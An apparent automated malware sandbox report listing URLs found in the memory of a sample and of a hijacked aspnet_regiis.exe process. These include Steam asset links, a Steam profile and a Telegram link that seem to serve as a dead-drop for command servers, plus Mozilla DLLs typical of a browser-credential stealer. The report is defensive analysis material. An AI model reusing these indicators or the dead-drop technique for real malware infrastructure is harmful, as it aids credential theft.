Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: DBFIEH.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: file.exe	String found in binary or memory: https://pidgin.im0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: file.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997804188699&
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869Y
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
